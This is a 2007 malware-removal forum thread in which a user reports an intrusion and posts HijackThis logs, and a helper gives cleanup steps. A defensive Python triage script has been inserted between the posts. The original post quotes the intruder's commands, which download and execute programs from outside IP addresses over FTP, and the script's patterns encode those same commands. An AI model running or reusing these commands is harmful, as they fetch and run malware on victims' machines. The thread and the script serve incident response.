

Hacker On My System!



#1 kghastie

  • Members
  • 61 posts

Posted 08 January 2007 - 07:30 PM

I have a hacker who has gotten onto my system after I reinstalled the firmware on my D-Link DWI-524 router and presumably left a hole open when I reconfigured it. The hacker was able to open a console, install some executables in the Windows system folder, and open some FTP connections. What should I do!? Comcast is of no help.

I'm pasting my HijackThis log and process/dll list, and I'll try to attach the screenshots I took of the console window that he left open, and some of my Event Viewer logs, which have some activity (including something funny going on with a possibly fake svchost.exe). Actually - is it safe for me to post Event Viewer System logs here?

Any help cleaning/securing my system would be much appreciated, as well as any ideas of how I could avenge myself, legally or vigilante-wise. I have some IP addresses he left....

Here are some of the commands he tried to run from my Run history:

cmd.exe /c del i&echo open 24.11.220.251 11040 > i&echo user 1 1 >> i &echo get 503.exe >> i &echo quit >> i &ftp -n -s:i &503.exe&del i&exit

ftp -i 85.201.69.2 GET winligom.exe

%systemroot%\system32\cmd.exe

get anisim.exe& start anisim.exe& exit



Thanks in advance,


*******************************
********* HijackThis log *********
*******************************

Logfile of HijackThis v1.99.1
Scan saved at 4:33:31 PM, on 1/8/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
E:\Program Files\Windows Defender\MsMpEng.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\ehome\ehtray.exe
C:\WINDOWS\System32\ezSP_Px.exe
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\Program Files\EzButton\CplBTQ00.EXE
C:\Program Files\TOSHIBA\Power Management\CePMTray.exe
C:\Program Files\Toshiba Controls\CpRmtKey.EXE
C:\Program Files\TOSHIBA\E-KEY\CeEKey.exe
C:\Program Files\TOSHIBA\TouchPad\TPTray.exe
C:\Program Files\LogMeIn\LogMeInSystray.exe
C:\WINDOWS\ehome\ehmsas.exe
C:\Program Files\Google\Gmail Notifier\gnotify.exe
C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe
E:\Program Files\Windows Defender\MSASCui.exe
C:\WINDOWS\system32\RUNDLL32.EXE
E:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Google\Google Desktop Search\GoogleDesktopIndex.exe
C:\Program Files\Google\Google Desktop Search\GoogleDesktopCrawl.exe
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\WINDOWS\system32\cisvc.exe
C:\Program Files\Executive Software\Diskeeper\DkService.exe
C:\WINDOWS\System32\DVDRAMSV.exe
C:\WINDOWS\ehome\ehSched.exe
C:\WINDOWS\system32\inetsrv\inetinfo.exe
C:\Program Files\LogMeIn\RaMaint.exe
C:\Program Files\LogMeIn\LogMeIn.exe
C:\recycler\sis\msn\svchost.exe
E:\Program Files\YourWare Solutions\FreeRAM XP Pro\FreeRAM XP Pro.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\WINDOWS\system32\nvsvc32.exe
C:\Program Files\RealVNC\VNC4\WinVNC4.exe
C:\Program Files\Common Files\Symantec Shared\Security Center\SymWSC.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\cidaemon.exe
C:\WINDOWS\system32\cidaemon.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\WINDOWS\system32\cmd.exe
C:\WINDOWS\system32\ftp.exe
C:\WINDOWS\system32\mmc.exe
C:\Program Files\Lavasoft\Ad-Aware SE Professional\Ad-Aware.exe
C:\Program Files\WinRAR\WinRAR.exe
C:\Program Files\Adobe\Photoshop 7.0\Photoshop.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\mmc.exe
C:\WINDOWS\winhlp32.exe
C:\WINDOWS\system32\taskmgr.exe
C:\DOCUME~1\LAUNCH~1\LOCALS~1\Temp\Temporary Directory 1 for hijackthis.zip\HijackThis.exe

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.toshiba.com
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = http://www.toshiba.com/
R3 - URLSearchHook: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - (no file)
F2 - REG:system.ini: Shell=
O3 - Toolbar: Norton AntiVirus - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - C:\Program Files\Norton AntiVirus\NavShExt.dll
O3 - Toolbar: SecurityToolbar - {736b5468-bdad-41be-92d0-22ae2ddf7bcb} - C:\Program Files\Security Toolbar\Security Toolbar.dll
O4 - HKLM\..\Run: [ehTray] C:\WINDOWS\ehome\ehtray.exe
O4 - HKLM\..\Run: [ezShieldProtector for Px] C:\WINDOWS\System32\ezSP_Px.exe
O4 - HKLM\..\Run: [ccApp] "C:\Program Files\Common Files\Symantec Shared\ccApp.exe"
O4 - HKLM\..\Run: [ccRegVfy] "C:\Program Files\Common Files\Symantec Shared\ccRegVfy.exe"
O4 - HKLM\..\Run: [CplBTQ00] C:\Program Files\EzButton\CplBTQ00.EXE
O4 - HKLM\..\Run: [CeEPOWER] C:\Program Files\TOSHIBA\Power Management\CePMTray.exe
O4 - HKLM\..\Run: [CpRmtKey] "C:\Program Files\Toshiba Controls\CpRmtKey.EXE"
O4 - HKLM\..\Run: [CeEKEY] C:\Program Files\TOSHIBA\E-KEY\CeEKey.exe
O4 - HKLM\..\Run: [TPNF] C:\Program Files\TOSHIBA\TouchPad\TPTray.exe
O4 - HKLM\..\Run: [Symantec NetDriver Monitor] C:\PROGRA~1\SYMNET~1\SNDMon.exe /Consumer
O4 - HKLM\..\Run: [LogMeIn GUI] "C:\Program Files\LogMeIn\LogMeInSystray.exe"
O4 - HKLM\..\Run: [REGSHAVE] C:\Program Files\REGSHAVE\REGSHAVE.EXE /AUTORUN
O4 - HKLM\..\Run: [{0228e555-4f9c-4e35-a3ec-b109a192b4c2}] C:\Program Files\Google\Gmail Notifier\gnotify.exe
O4 - HKLM\..\Run: [DiskeeperSystray] "C:\Program Files\Executive Software\Diskeeper\DkIcon.exe"
O4 - HKLM\..\Run: [Tweak UI] RUNDLL32.EXE TWEAKUI.CPL,TweakMeUp
O4 - HKLM\..\Run: [Google Desktop Search] "C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe" /startup
O4 - HKLM\..\Run: [Windows Defender] "E:\Program Files\Windows Defender\MSASCui.exe" -hide
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [iTunesHelper] "E:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [value] scvhost.exe
O4 - HKLM\..\Run: [Winlogon] c:\recycler\sis\msn\svchost.exe
O4 - HKLM\..\RunServices: [value] scvhost.exe
O4 - HKCU\..\Run: [FreeRAM XP] "e:\Program Files\YourWare Solutions\FreeRAM XP Pro\FreeRAM XP Pro.exe" -win
O4 - HKCU\..\Run: [value] scvhost.exe
O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: Shareaza.lnk = E:\Program Files\Shareaza\Shareaza.exe
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O8 - Extra context menu item: Save with Download Manager... - file://E:\Program Files\J River\Media Center 11\DMDownload.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll (file missing)
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll (file missing)
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\System32\Shdocvw.dll
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O12 - Plugin for .spop: C:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
O14 - IERESET.INF: START_PAGE_URL=http://www.toshiba.com
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupdate/...b?1141793772593
O16 - DPF: {DF780F87-FF2B-4DF8-92D0-73DB16A1543A} (PopCapLoader Object) - http://download.games.yahoo.com/games/web_...aploader_v6.cab
O20 - AppInit_DLLs: C:\PROGRA~1\Google\GOOGLE~1\GOEC62~1.DLL
O20 - Winlogon Notify: LMIinit - C:\WINDOWS\SYSTEM32\LMIinit.dll
O20 - Winlogon Notify: WgaLogon - C:\WINDOWS\SYSTEM32\WgaLogon.dll
O23 - Service: Apache2 - Unknown owner - E:\WebServ\apache2\bin\Apache.exe" -k runservice (file missing)
O23 - Service: Symantec Event Manager (ccEvtMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
O23 - Service: Symantec Password Validation Service (ccPwdSvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccPwdSvc.exe
O23 - Service: Diskeeper - Executive Software International, Inc. - C:\Program Files\Executive Software\Diskeeper\DkService.exe
O23 - Service: DVD-RAM_Service - Matsushita Electric Industrial Co., Ltd. - C:\WINDOWS\System32\DVDRAMSV.exe
O23 - Service: GhostStartService - Symantec Corporation - C:\PROGRA~1\Symantec\NORTON~1\GHOSTS~2.EXE
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: iPod Service - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: LogMeIn Maintenance Service (LMIMaint) - LogMeIn, Inc. - C:\Program Files\LogMeIn\RaMaint.exe
O23 - Service: LogMeIn - LogMeIn, Inc. - C:\Program Files\LogMeIn\LogMeIn.exe
O23 - Service: MySQL - Unknown owner - E:\WebServ\mysql\bin\mysqld-nt".exe (file missing)
O23 - Service: Norton AntiVirus Auto Protect Service (navapsvc) - Symantec Corporation - C:\Program Files\Norton AntiVirus\navapsvc.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: ScriptBlocking Service (SBService) - Symantec Corporation - C:\PROGRA~1\COMMON~1\SYMANT~1\SCRIPT~1\SBServ.exe
O23 - Service: Symantec Network Drivers Service (SNDSrvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\SNDSrvc.exe
O23 - Service: SymWMI Service (SymWSC) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\Security Center\SymWSC.exe
O23 - Service: VNC Server Version 4 (WinVNC4) - Unknown owner - C:\Program Files\RealVNC\VNC4\WinVNC4.exe" -service (file missing)

*******************************
***** HijackThis processlist.txt *****
*******************************

Process list saved on 4:38:48 PM, on 1/8/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)

[pid] [full path to filename] [file version] [company name]
728 C:\WINDOWS\System32\smss.exe 5.1.2600.2180 Microsoft Corporation
816 C:\WINDOWS\system32\winlogon.exe 5.1.2600.2180 Microsoft Corporation
864 C:\WINDOWS\system32\services.exe 5.1.2600.2180 Microsoft Corporation
876 C:\WINDOWS\system32\lsass.exe 5.1.2600.2180 Microsoft Corporation
1052 C:\WINDOWS\system32\svchost.exe 5.1.2600.2180 Microsoft Corporation
1228 E:\Program Files\Windows Defender\MsMpEng.exe 1.1.1593.0 Microsoft Corporation
1268 C:\WINDOWS\System32\svchost.exe 5.1.2600.2180 Microsoft Corporation
1756 C:\WINDOWS\system32\spoolsv.exe 5.1.2600.2696 Microsoft Corporation
236 C:\WINDOWS\Explorer.EXE 6.0.2900.2180 Microsoft Corporation
412 C:\WINDOWS\ehome\ehtray.exe 5.1.2600.2180 Microsoft Corporation
648 C:\WINDOWS\System32\ezSP_Px.exe 1.0.0.0 Easy Systems Japan Ltd.
656 C:\Program Files\Common Files\Symantec Shared\ccApp.exe 1.0.10.6 Symantec Corporation
576 C:\Program Files\EzButton\CplBTQ00.EXE 1.2.1.0 Dritek System Inc.
676 C:\Program Files\TOSHIBA\Power Management\CePMTray.exe 1.0.0.23 COMPAL ELECTRONIC INC.
684 C:\Program Files\Toshiba Controls\CpRmtKey.EXE 1.1.0.1 Dritek System Inc.
764 C:\Program Files\TOSHIBA\E-KEY\CeEKey.exe 2.0.0.16 COMPAL ELECTRONIC INC.
792 C:\Program Files\TOSHIBA\TouchPad\TPTray.exe 1.0.0.11 COMPAL ELECTRONIC INC.
1168 C:\Program Files\LogMeIn\LogMeInSystray.exe 2.30.0.555 LogMeIn, Inc.
1204 C:\WINDOWS\ehome\ehmsas.exe 5.1.2600.2180 Microsoft Corporation
1216 C:\Program Files\Google\Gmail Notifier\gnotify.exe 1.0.25.0 Google Inc.
1304 C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe 4.2006.1008.2039 Google
1348 E:\Program Files\Windows Defender\MSASCui.exe 1.1.1593.0 Microsoft Corporation
1420 C:\WINDOWS\system32\RUNDLL32.EXE 5.1.2600.2180 Microsoft Corporation
1468 E:\Program Files\iTunes\iTunesHelper.exe 7.0.0.70 Apple Computer, Inc.
1612 C:\Program Files\Google\Google Desktop Search\GoogleDesktopIndex.exe 4.2006.1008.2039 Google
340 C:\Program Files\Google\Google Desktop Search\GoogleDesktopCrawl.exe 4.2006.1008.2039 Google
2012 C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe 1.0.3.4 Symantec Corporation
1700 C:\WINDOWS\system32\cisvc.exe 5.1.2600.2180 Microsoft Corporation
1828 C:\Program Files\Executive Software\Diskeeper\DkService.exe 9.0.515.0 Executive Software International, Inc.
2100 C:\WINDOWS\System32\DVDRAMSV.exe 2.0.6.0 Matsushita Electric Industrial Co., Ltd.
2140 C:\WINDOWS\ehome\ehSched.exe 5.1.2600.2180 Microsoft Corporation
2200 C:\WINDOWS\system32\inetsrv\inetinfo.exe 5.1.2600.2180 Microsoft Corporation
2268 C:\Program Files\LogMeIn\RaMaint.exe 2.30.0.555 LogMeIn, Inc.
2360 C:\Program Files\LogMeIn\LogMeIn.exe 2.30.0.555 LogMeIn, Inc.
2720 C:\recycler\sis\msn\svchost.exe 6.0.3.0 mIRC Co. Ltd.
2728 E:\Program Files\YourWare Solutions\FreeRAM XP Pro\FreeRAM XP Pro.exe 1.5.1.0 YourWare Solutions ™
2856 C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE 7.0.9466.0 Microsoft Corporation
2888 C:\WINDOWS\system32\nvsvc32.exe 6.14.10.9371 NVIDIA Corporation
3176 C:\Program Files\RealVNC\VNC4\WinVNC4.exe 4.1.1.0 RealVNC Ltd.
3584 C:\Program Files\Common Files\Symantec Shared\Security Center\SymWSC.exe 2005.1.2.20 Symantec Corporation
2500 C:\Program Files\iPod\bin\iPodService.exe 7.0.0.70 Apple Computer, Inc.
1788 C:\WINDOWS\System32\svchost.exe 5.1.2600.2180 Microsoft Corporation
2000 C:\WINDOWS\system32\cidaemon.exe 5.1.2600.0 Microsoft Corporation
1120 C:\WINDOWS\system32\cidaemon.exe 5.1.2600.0 Microsoft Corporation
3856 C:\Program Files\Mozilla Firefox\firefox.exe 1.8.20061.20418 Mozilla Corporation
328 C:\WINDOWS\system32\cmd.exe 5.1.2600.2180 Microsoft Corporation
3684 C:\WINDOWS\system32\ftp.exe 5.1.2600.2180 Microsoft Corporation
544 C:\WINDOWS\system32\mmc.exe 5.1.2600.2180 Microsoft Corporation
300 C:\Program Files\Lavasoft\Ad-Aware SE Professional\Ad-Aware.exe 6.2.0.208 Lavasoft Sweden
3676 C:\Program Files\WinRAR\WinRAR.exe 3.51.0.0
4012 C:\Program Files\Adobe\Photoshop 7.0\Photoshop.exe 7.0.0.0 Adobe Systems, Incorporated
2996 C:\WINDOWS\System32\svchost.exe 5.1.2600.2180 Microsoft Corporation
2912 C:\WINDOWS\system32\mmc.exe 5.1.2600.2180 Microsoft Corporation
2756 C:\WINDOWS\winhlp32.exe 5.1.2600.2180 Microsoft Corporation
336 C:\WINDOWS\system32\taskmgr.exe 5.1.2600.2180 Microsoft Corporation
1160 C:\DOCUME~1\LAUNCH~1\LOCALS~1\Temp\Temporary Directory 1 for hijackthis.zip\HijackThis.exe 1.99.0.1 Soeperman Enterprises Ltd.


DLLs loaded by process E:\Program Files\Windows Defender\MsMpEng.exe:

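As an added example (not from the post and not part of HijackThis or any tool named here), a small Python triage script that applies the two checks this thread turns on: misspelled or misplaced copies of system binaries in HijackThis O4 autostart entries, and the echo-into-script FTP downloader pattern in the Run history. The sample lines are quoted from the post above; the list of imitated binaries, the Windows folder prefixes and the 0.85 name-similarity threshold are my assumptions.

```python
import re
from difflib import SequenceMatcher
# Names bots imitate by misspelling (scvhost) or by dropping a copy elsewhere
# (recycler\...\svchost.exe), plus the folders the genuine ones live in (assumed list).
SYSTEM_NAMES = {"svchost.exe", "winlogon.exe", "lsass.exe", "csrss.exe", "services.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\")
# Echo-into-script FTP downloader, as seen in the Run history above:
#   echo open <host> <port> > i & ... & echo get <file> >> i & ... & ftp -n -s:i
FTP_SCRIPT = re.compile(
    r"echo\s+open\s+(?P<host>\S+)\s+(?P<port>\d+)\s*>\s*(?P<script>[^\s&]+)"
    r".*?echo\s+get\s+(?P<file>[^\s&]+)\s*>>\s*(?P=script)"
    r".*?ftp\s+-n\s+-s:(?P=script)", re.I)
# Direct form: ftp [-flags] <host> GET <file>
FTP_DIRECT = re.compile(r"ftp\s+(?:-\w+\s+)*(?P<host>\d+(?:\.\d+){3})\s+get\s+(?P<file>\S+)", re.I)

def ftp_dropper(cmd):
    """Return the download server and file if cmd is an FTP dropper, else None."""
    for pat in (FTP_SCRIPT, FTP_DIRECT):
        m = pat.search(cmd)
        if m:
            return m.groupdict()
    return None

def target_path(cmd):
    """First token of an O4 command line: a quoted path or a bare word."""
    cmd = cmd.strip()
    return cmd[1:].split('"', 1)[0] if cmd.startswith('"') else cmd.split()[0]

def check_o4(line):
    """Reasons a HijackThis O4 autostart entry looks like a bot (empty if none)."""
    m = re.match(r"O4 - (?P<key>\S+): \[(?P<name>[^\]]*)\] (?P<cmd>.+)", line)
    if not m:
        return []
    path = target_path(m.group("cmd")).lower().replace("/", "\\")
    exe = path.rsplit("\\", 1)[-1]
    reasons = []
    if exe in SYSTEM_NAMES and not path.startswith(SYSTEM_DIRS):
        reasons.append(f"{exe} launched from outside the Windows folder: {path}")
    # Near-miss spellings of a system binary (threshold 0.85 is an assumption)
    near = [s for s in sorted(SYSTEM_NAMES)
            if s != exe and SequenceMatcher(None, exe, s).ratio() >= 0.85]
    if near:
        reasons.append(f"{exe} imitates {near[0]}")
    if "\\recycler\\" in path:
        reasons.append("launched from the Recycle Bin folder")
    return reasons

# Constructed sample: entries quoted from the HijackThis log and Run history above.
SAMPLE_O4 = [
    r'O4 - HKLM\..\Run: [ccApp] "C:\Program Files\Common Files\Symantec Shared\ccApp.exe"',
    r"O4 - HKLM\..\Run: [value] scvhost.exe",
    r"O4 - HKLM\..\Run: [Winlogon] c:\recycler\sis\msn\svchost.exe",
]
SAMPLE_RUN = [
    "cmd.exe /c del i&echo open 24.11.220.251 11040 > i&echo user 1 1 >> i "
    "&echo get 503.exe >> i &echo quit >> i &ftp -n -s:i &503.exe&del i&exit",
    "ftp -i 85.201.69.2 GET winligom.exe",
    "get anisim.exe& start anisim.exe& exit",
]

def triage(o4_lines, commands):
    """Collect flagged autostarts and dropper indicators for an incident note."""
    flagged = {l: check_o4(l) for l in o4_lines if check_o4(l)}
    droppers = [d for d in map(ftp_dropper, commands) if d]
    return {"autostart": flagged, "droppers": droppers}
```

The third Run-history line (`get anisim.exe& ...`) is deliberately not matched: it is only the tail of an interactive FTP session, so the server has to come from the earlier command or the FTP logs.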


#2 MFDnSC

    Ret. Director I/T


  • Members
  • 4,310 posts

Posted 08 January 2007 - 08:28 PM

You may want to print this or save it to notepad as we will go to safe mode.

Fix these with HiJackThis – mark them, close IE, click fix checked

O4 - HKLM\..\Run: [value] scvhost.exe

O4 - HKLM\..\Run: [Winlogon] c:\recycler\sis\msn\svchost.exe

O4 - HKLM\..\RunServices: [value] scvhost.exe

O4 - HKCU\..\Run: [value] scvhost.exe

Download http://www.downloads.subratam.org/KillBox.zip or
http://www.thespykiller.co.uk/files/killbox.exe

Restart your computer into safe mode now. (Tapping F8 at the first black screen) Perform the following steps in safe mode:

Double-click on Killbox.exe to run it. Now put a tick by Standard File Kill. In the "Full Path of File to Delete" box, copy and paste each of the following lines one at a time, then click on the button that has the red circle with the X in the middle after you enter each file. It will ask for confirmation to delete the file. Click Yes. Continue with that same procedure until you have copied and pasted all of these in the "Paste Full Path of File to Delete" box.

c:\recycler\sis
C:\WINDOWS\System32\scvhost.exe

Note: It is possible that Killbox will tell you that one or more files do not exist. If that happens, just continue on with all the files. Be sure you don't miss any.

START – RUN – type in %temp% - OK - Edit – Select all – File – Delete

Delete everything in the C:\Windows\Temp folder or C:\WINNT\temp

Not all temp files will delete and that is normal
Empty the recycle bin
Boot


Download Superantispyware

http://www.superantispyware.com/superantis...efreevspro.html

Install it and double-click the icon on your desktop to run it.
  • It will ask if you want to update the program definitions, click Yes.
  • Under Configuration and Preferences, click the Preferences button.
  • Click the Scanning Control tab.
  • Under Scanner Options make sure the following are checked:
      • Close browsers before scanning
      • Scan for tracking cookies
      • Terminate memory threats before quarantining.
      • Please leave the others unchecked.
      • Click the Close button to leave the control center screen.
  • On the main screen, under Scan for Harmful Software click Scan your computer.
  • On the left check C:\Fixed Drive.
  • On the right, under Complete Scan, choose Perform Complete Scan.
  • Click Next to start the scan. Please be patient while it scans your computer.
  • After the scan is complete a summary box will appear. Click OK.
  • Make sure everything in the white box has a check next to it, then click Next.
  • It will quarantine what it found and if it asks if you want to reboot, click Yes.
  • To retrieve the removal information for me please do the following:
      • After reboot, double-click the SUPERAntispyware icon on your desktop.
      • Click Preferences. Click the Statistics/Logs tab.
      • Under Scanner Logs, double-click SUPERAntiSpyware Scan Log.
      • It will open in your default text editor (such as Notepad/Wordpad).
      • Please highlight everything in the notepad, then right-click and choose copy.
  • Click close and close again to exit the program.
  • Please paste that information here for me with a new HijackThis log.


Please give feedback on what worked/didn’t work and the current status of your system
"Nothing could be finer than to be in South Carolina ............"

Member ASAP



